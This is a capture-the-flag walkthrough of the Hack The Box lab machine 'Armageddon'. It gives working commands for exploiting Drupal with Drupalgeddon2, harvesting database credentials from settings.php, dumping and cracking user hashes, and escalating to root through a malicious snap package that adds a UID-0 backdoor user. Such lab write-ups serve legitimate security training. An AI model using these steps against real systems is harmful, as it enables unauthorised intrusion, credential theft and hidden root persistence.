Armageddon

https://app.hackthebox.com/machines/323

Nmap

nmap 10.10.10.233 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)

Port 80 hosts a web server which is visually identifiable as a Drupal instance.

Standard enumeration did not show any interest information. From here drupwn was utilized to identify the exact version of Drupal installed.

Github: https://github.com/immunIT/drupwn

Install

git clone https://github.com/immunIT/drupwn.git
cd drupwn
python3 setup.py install

Usage

drupwn --mode enum --target http://10.10.10.233  

Searchsploit **** shows that this version of Drupal is vulnerable to "Drupalgeddon".

searchsploit -w "drupal 7.56"

Metasploit has a module for drupalgeddon2. Once the corrects options were set the exploit was executed.

Where we receive a meterpreter shell.

Now with a shell, we find we are working as the apache user. As Drupal is installed we perform some basic enumeration steps to look for MySQL usernames and passwords. The command below can be used to scour the settings.php file for this information.

find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null

Finding the above credentials we run a single command against MySQL to find a hash for a user on the machine.

mysql -u drupaluser --password='CQHEy@9M*m23gBVj' -e 'use drupal; select * from users'

This hash is then cracked with john to reveal the credentials: brucetherealadmin:boobo.

sudo john --wordlist=/usr/share/wordlists/rockyou.txt ~/Desktop/hash.txt   

We can now login over SSH as the user brucetherealadmin.

From here linpeas.sh was utilized to help with Privilege Escalation identification.

We find the current user can run the /usr/bin/snap binary as the root user without specifying a password.

GTFOBins: https://gtfobins.github.io/gtfobins/snap/

From the above GTFOBins link we see that a malicious package can be crafted and used to execute the package in the context of the root user.

The blog post linked below shows some ways in which this can be done.

Blog: https://blog.ikuamike.io/posts/2021/package_managers_privesc/#exploitation-snap

We can also use the below Snap_Generator to help us easily craft the required snap packages.

Github: https://github.com/0xAsh/Snap_Generator

Install fpm (Required)

sudo gem install fpm

Download and prepare Snap_Generator

wget https://raw.githubusercontent.com/0xAsh/Snap_Generator/main/snap_generator.sh && chmod +x snap_generator.sh

After running the above command we need to then issue a command to the snap_generator.sh script to use in our package. In this instance we will add a new root user to the target system.

/usr/sbin/useradd -p $(openssl passwd -1 Password123) -u 0 -o -s /bin/bash -m owned

Upload the snap package to the target system.

sudo -u root /usr/bin/snap install /home/brucetherealadmin/owned_1.0_all.snap --dangerous --devmode

After completion check for existence of the new user.

Once confirmed, switch over to the new user.